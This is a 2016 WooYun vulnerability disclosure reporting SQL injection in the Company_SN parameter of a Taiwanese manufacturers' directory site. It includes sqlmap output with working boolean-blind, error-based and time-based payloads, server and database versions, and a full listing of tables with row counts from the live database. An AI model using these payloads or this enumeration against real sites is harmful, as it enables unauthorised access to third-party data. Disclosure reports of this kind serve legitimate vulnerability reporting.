当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168980

漏洞标题:Trade Winners Asia Manufacturers Web Directory 存在SQL注入(臺灣地區)

相关厂商:Trade Winners Asia Manufacturers Web Directory

漏洞作者: 路人甲

提交时间:2016-01-11 13:31

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

详细说明:

目标站点:http://**.**.**.**/
一个提供大陆和台湾的公司目录的网址。英语不是很好,大概就是这样子。所以数据量巨大
注入点:http://**.**.**.**/site/about_us/title31_c/index.php?Company_SN=19560

sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: Company_SN (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Company_SN=19560 AND 1651=1651
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Company_SN=19560 AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x71716b7871,(SELECT (ELT(1414=1414,1))),0x7178767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: Company_SN=19560 AND (SELECT * FROM (SELECT(SLEEP(5)))gxXk)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.3.16
back-end DBMS: MySQL 5.0


current database:    'twinner'
current user is DBA:    False
available databases [4]:
[*] information_schema
[*] muchcalm
[*] twinner
[*] twinner_dev


爆数据了,表和数据量真的不小哦!第一条就七百多万

Database: twinner
+------------------------------------------+---------+
| Table                                    | Entries |
+------------------------------------------+---------+
| Product_Detail                           | 7043577 |
| Temp_Storage                             | 369603  |
| Product_Feature_Detail                   | 269950  |
| Product_Property                         | 251878  |
| Product                                  | 162398  |
| Product_Site_Classify_Images             | 58180   |
| Product_Feature_Relation                 | 48567   |
| Product_Feature                          | 48240   |
| upload                                   | 38656   |
| Product_Classify                         | 33938   |
| Company_Member                           | 33461   |
| Product_MoreSpec                         | 27905   |
| Product_Site_Classify                    | 26732   |
| Inquiry_Title                            | 22181   |
| Inquiry_List                             | 21731   |
| Product_Property_Temp                    | 19409   |
| Product_Other_Image                      | 17131   |
| Inquiry_List2                            | 16283   |
| Inquiry_Title2                           | 15217   |
| Company_Member_Relation                  | 13951   |
| company_member_class                     | 13542   |
| Company                                  | 13134   |
| Web_Connection                           | 9470    |
| Gbook_R                                  | 8574    |
| Authority_Company_Site_Function          | 7786    |
| Product_Price                            | 6978    |
| Company_Site_Function                    | 6959    |
| general_inquiry                          | 6770    |
| company_new_product                      | 6626    |
| Product_Temp                             | 6368    |
| FAQ                                      | 5764    |
| Company_crm_contact                      | 4511    |
| customer_source                          | 4292    |
| Product_Index                            | 4040    |
| sp_s17                                   | 3366    |
| sp_fieldvalue                            | 3051    |
| crm2_sendmail                            | 3045    |
| end_user_classify                        | 2975    |
| Order_NO                                 | 2889    |
| sp_s3                                    | 2803    |
| sp_s4                                    | 2736    |
| Site_News                                | 2695    |
| sp_s2                                    | 2587    |
| sp_s15                                   | 2436    |
| sp_s16                                   | 2432    |
| sp_s7                                    | 2403    |
| sp_s8                                    | 2333    |
| Product_Classify_3                       | 2315    |
| Ad_Classify                              | 2312    |
| supplier_member_login                    | 2223    |
| s_S2                                     | 2189    |
| sp_s10                                   | 2168    |
| sp_s12                                   | 2151    |
| Product_Classify_AppRelation             | 2075    |
| sp_s11                                   | 2075    |
| s_S1                                     | 2064    |
| Company_Site                             | 2027    |
| sp_s14                                   | 2015    |
| sp_s18                                   | 1881    |
| Company_Contact                          | 1847    |
| s_S3                                     | 1795    |
| Order_Detail                             | 1784    |
| sp_s6                                    | 1750    |
| analytic_mgmt                            | 1625    |
| sp_s1                                    | 1616    |
| sp_s9                                    | 1574    |
| sp_s13                                   | 1560    |
| sp_s5                                    | 1418    |
| s_fieldvalue                             | 1330    |
| s_S5                                     | 1275    |
| sp_s20                                   | 1271    |
| Site_Banner                              | 1257    |
| classify3                                | 1248    |
| Company_Site_Function_copy               | 1203    |
| s_S4                                     | 1202    |
| Competitor_Products                      | 1186    |
| Product_Tabview                          | 1181    |
| s_S6                                     | 1164    |
| Product_Classify_PitchRel                | 1141    |
| About_US                                 | 1133    |
| Product_Site_Classify_MoreSpec           | 1096    |
| select_temp                              | 1043    |
| FAQ_Classify                             | 1017    |
| Solutions_Classify                       | 968     |
| inquiries                                | 902     |
| sp_s23                                   | 899     |
| Order_Title                              | 896     |
| sp_field                                 | 808     |
| sp_s22                                   | 738     |
| forsale                                  | 736     |
| sp_s19                                   | 731     |
| Safety_Relation                          | 714     |
| Contact_Us                               | 639     |
| Customer_Manager                         | 623     |
| keyword_search                           | 605     |
| Web_Connection_Temp                      | 600     |
| Authority_Group_Company_Relation         | 544     |
| company_classify_keyword                 | 541     |
| App_Relation                             | 539     |
| Product_Classify_2                       | 510     |
| sp_s21                                   | 503     |
| App_Classify                             | 474     |
| Letter                                   | 460     |
| Authority_Product_Site_Classify_Function | 456     |
| Product_Other_Image_copy                 | 439     |
| Authority_Menu_Function                  | 438     |
| Web_Connection_Classify                  | 428     |
| Authority_FAQ_Classify_Function          | 426     |
| Site_Home                                | 414     |
| wke_area                                 | 371     |
| Product_MoreSpec_Temp                    | 345     |
| Code_Data                                | 344     |
| Company_keyword                          | 332     |
| s_S10                                    | 307     |
| Product_Structural_Images                | 288     |
| sp_s24                                   | 284     |
| s_S8                                     | 270     |
| Region                                   | 249     |
| Associate_Member                         | 248     |
| Authority_Menu_Collection                | 243     |
| Product_App_Count                        | 238     |
| Associate                                | 217     |
| AppProduct                               | 211     |
| s_S7                                     | 210     |
| Service                                  | 181     |
| sp_group                                 | 167     |
| TempProduct                              | 149     |
| s_fieldname                              | 147     |
| Product_Safe_Image                       | 140     |
| Site_News_classify                       | 139     |
| campaign_supplier                        | 133     |
| gc_male                                  | 131     |
| Attend_Member                            | 120     |
| Authority_Menu_Subsystem                 | 117     |
| Register                                 | 112     |
| Associate_Member_Relation                | 111     |
| Product_HowOrder_Images                  | 108     |
| company_note                             | 100     |
| Classify_MoreSpec                        | 97      |
| Service_Classify                         | 93      |
| customer_certif                          | 91      |
| classify2                                | 89      |
| Product_Pitch_Count                      | 89      |
| template_record                          | 87      |
| Product_Detail_PDF                       | 86      |
| s_S9                                     | 85      |
| oem_odm                                  | 81      |
| SN_Counter                               | 81      |
| Product_app_Classify_3                   | 80      |
| Spec_Search                              | 64      |
| company_messenger                        | 61      |
| Product_Site_Classify_Rel                | 61      |
| Site_Function                            | 59      |
| sp_s26                                   | 57      |
| City                                     | 54      |
| Product_Property_hr_preset               | 52      |
| Member_Bonus                             | 51      |
| Safety                                   | 47      |
| sp_s25                                   | 46      |
| campaign_product                         | 45      |
| Product_Classify_1                       | 44      |
| Carriage_Charge                          | 43      |
| customer_sales                           | 43      |
| Menu_Function                            | 43      |
| Product_factory_Relation                 | 43      |
| customer_staff                           | 41      |
| Product_Classify_Pitch                   | 38      |
| s_tablename                              | 37      |
| Inquiry_List_Temp                        | 35      |
| Authority_Group                          | 32      |
| sp_s27                                   | 31      |
| Product_MoreSpecAV                       | 29      |
| Letter_Title                             | 28      |
| factory                                  | 26      |
| Gbook                                    | 23      |
| history_record                           | 23      |
| Title                                    | 23      |
| Code_Type                                | 22      |
| s_product                                | 22      |
| wke_country                              | 22      |
| order_factory_temp                       | 21      |
| Product_Classify_App                     | 19      |
| Company_crm_messenger                    | 18      |
| crm2_sendmail_content                    | 16      |
| Menu_Collection                          | 16      |
| factory_img                              | 15      |
| CompanyType                              | 14      |
| customer_sources                         | 13      |
| FAQ_MoreSpec                             | 13      |
| Product_Classify_0                       | 13      |
| Car_Member                               | 12      |
| CRM_Manager                              | 12      |
| classify1                                | 11      |
| end_user_classify_to_product             | 11      |
| Member                                   | 11      |
| Competitor_cols                          | 10      |
| Property                                 | 10      |
| wke_lion                                 | 10      |
| wke_lion_mgn                             | 10      |
| wke_plan                                 | 10      |
| wke_plan_mgn                             | 10      |
| Modules                                  | 9       |
| Product_app_Classify_2                   | 8       |
| Sale_Contact                             | 7       |
| supplier_category                        | 7       |
| Twinner_Manager                          | 7       |
| verify_list                              | 7       |
| Carriage_Type                            | 6       |
| Company_Temp                             | 6       |
| mail_model                               | 6       |
| Menu_Subsystem                           | 6       |
| messenger_protocol                       | 6       |
| rotate_swf                               | 6       |
| Sale_Order                               | 6       |
| upload_av                                | 6       |
| cad_specify_cable                        | 5       |
| Charset                                  | 5       |
| Letter_Sender_Title                      | 5       |
| programs                                 | 5       |
| wke_block                                | 5       |
| wke_page                                 | 5       |
| `Language`                               | 4       |
| gc_female                                | 4       |
| list_level                               | 4       |
| Sale_Master                              | 4       |
| Associate_Type                           | 3       |
| Product_Property_hr_title                | 3       |
| Code_Temp                                | 2       |
| MinOrdUnit                               | 2       |
| Parameter_Sheet                          | 2       |
| Product_app_Classify_0                   | 2       |
| Product_app_Classify_1                   | 2       |
| product_quotation                        | 2       |
| wke_news                                 | 2       |
| wke_school                               | 2       |
| number_manage                            | 1       |
| s_show                                   | 1       |
| twinner_right_banner                     | 1       |
| wke_aboutus                              | 1       |
| wke_admuser                              | 1       |
| wke_child                                | 1       |
| wke_live                                 | 1       |
| wke_method                               | 1       |
| wke_pic                                  | 1       |
| wke_sponsor                              | 1       |
| wke_talk                                 | 1       |
| wke_video                                | 1       |
+------------------------------------------+---------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-12 01:45

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价